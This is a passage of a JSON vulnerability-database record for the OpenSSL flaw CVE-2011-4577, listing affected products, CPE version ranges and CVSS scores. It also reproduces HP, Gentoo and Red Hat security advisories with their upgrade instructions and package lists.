"tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "ds8870", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "linux enterprise desktop sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip pem hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "hardware management console 7r7.2.0 sp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.1" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "message networking", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.5" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "BID", "id": "51281" }, { "db": "CNNVD", "id": "CNNVD-201201-060" }, { "db": "NVD", "id": "CVE-2011-4577" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6h:bogus:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8r", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.0e", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2011-4577" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Nadhem Alfardan and Kenny Paterson, Information Security Group at Royal Holloway, University of London, Ben Laurie, Adam Langley, Andrew Chi, BBN Technologies and Andrey Kulikov", "sources": [ { "db": "BID", "id": "51281" } ], "trust": 0.3 }, "cve": "CVE-2011-4577", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2011-4577", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2011-4577", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201201-060", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2011-4577", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2011-4577" }, { "db": "CNNVD", "id": "CNNVD-201201-060" }, { "db": "NVD", "id": "CVE-2011-4577" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL before 0.9.8s and 1.x before 1.0.0f, when RFC 3779 support is enabled, allows remote attackers to cause a denial of service (assertion failure) via an X.509 certificate containing certificate-extension data associated with (1) IP address blocks or (2) Autonomous System (AS) identifiers. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. \nAn attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. \nHP SSL for OpenVMS v 1.4-453 (based on OpenSSL 0.9.8o stream) and earlier. \nHP System Management Homepage (SMH) before v7.1.1 running on Linux and\nWindows. HP System Management Homepage v7.1.1 is available here:\n\nHP System Management Homepage for Windows x64\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab\n0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Windows x86\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7\nc0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (AMD64/EM64T)\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18\nd373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (x86)\n\n[Download here] or enter the following URL into the browser address window. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201203-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: March 06, 2012\n Bugs: #397695, #399365\n ID: 201203-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, allowing remote\nattackers to cause a Denial of Service or obtain sensitive information. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.0g *\u003e= 0.9.8t\n \u003e= 1.0.0g\n\nDescription\n===========\n\nMultiple vulnerabilities have been found in OpenSSL:\n\n* Timing differences for decryption are exposed by CBC mode encryption\n in OpenSSL\u0027s implementation of DTLS (CVE-2011-4108). \n* An incorrect fix for CVE-2011-4108 creates an unspecified\n vulnerability for DTLS applications using OpenSSL (CVE-2012-0050). \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.0g\"\n\nReferences\n==========\n\n[ 1 ] CVE-2011-4108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4108\n[ 2 ] CVE-2011-4109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4109\n[ 3 ] CVE-2011-4576\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4576\n[ 4 ] CVE-2011-4577\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4577\n[ 5 ] CVE-2011-4619\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4619\n[ 6 ] CVE-2012-0027\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0027\n[ 7 ] CVE-2012-0050\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0050\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201203-12.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2012 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2012:0059-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2012-0059.html\nIssue date: 2012-01-24\nCVE Names: CVE-2011-4108 CVE-2011-4576 CVE-2011-4577 \n CVE-2011-4619 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n\nIt was discovered that the Datagram Transport Layer Security (DTLS)\nprotocol implementation in OpenSSL leaked timing information when\nperforming certain operations. A remote attacker could possibly use this\nflaw to retrieve plain text from the encrypted packets by using a DTLS\nserver as a padding oracle. (CVE-2011-4108)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. Incorrect initialization of SSL record padding bytes could\ncause an SSL client or server to send a limited amount of possibly\nsensitive data to its SSL peer via the encrypted connection. \n(CVE-2011-4576)\n\nA denial of service flaw was found in the RFC 3779 implementation in\nOpenSSL. A remote attacker could use this flaw to make an application using\nOpenSSL exit unexpectedly by providing a specially-crafted X.509\ncertificate that has malformed RFC 3779 extension data. (CVE-2011-4577)\n\nIt was discovered that OpenSSL did not limit the number of TLS/SSL\nhandshake restarts required to support Server Gated Cryptography. A remote\nattacker could use this flaw to make a TLS/SSL server using OpenSSL consume\nan excessive amount of CPU by continuously restarting the handshake. \n(CVE-2011-4619)\n\nAll OpenSSL users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. For the update to take effect,\nall services linked to the OpenSSL library must be restarted, or the system\nrebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n771770 - CVE-2011-4108 openssl: DTLS plaintext recovery attack\n771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding\n771778 - CVE-2011-4577 openssl: malformed RFC 3779 data can cause assertion failures\n771780 - CVE-2011-4619 openssl: SGC restart DoS attack\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-perl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-static-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\n\nppc64:\nopenssl-1.0.0-20.el6_2.1.ppc.rpm\nopenssl-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.ppc.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.ppc.rpm\nopenssl-devel-1.0.0-20.el6_2.1.ppc64.rpm\n\ns390x:\nopenssl-1.0.0-20.el6_2.1.s390.rpm\nopenssl-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.s390.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-devel-1.0.0-20.el6_2.1.s390.rpm\nopenssl-devel-1.0.0-20.el6_2.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-perl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-static-1.0.0-20.el6_2.1.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-static-1.0.0-20.el6_2.1.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-perl-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-static-1.0.0-20.el6_2.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 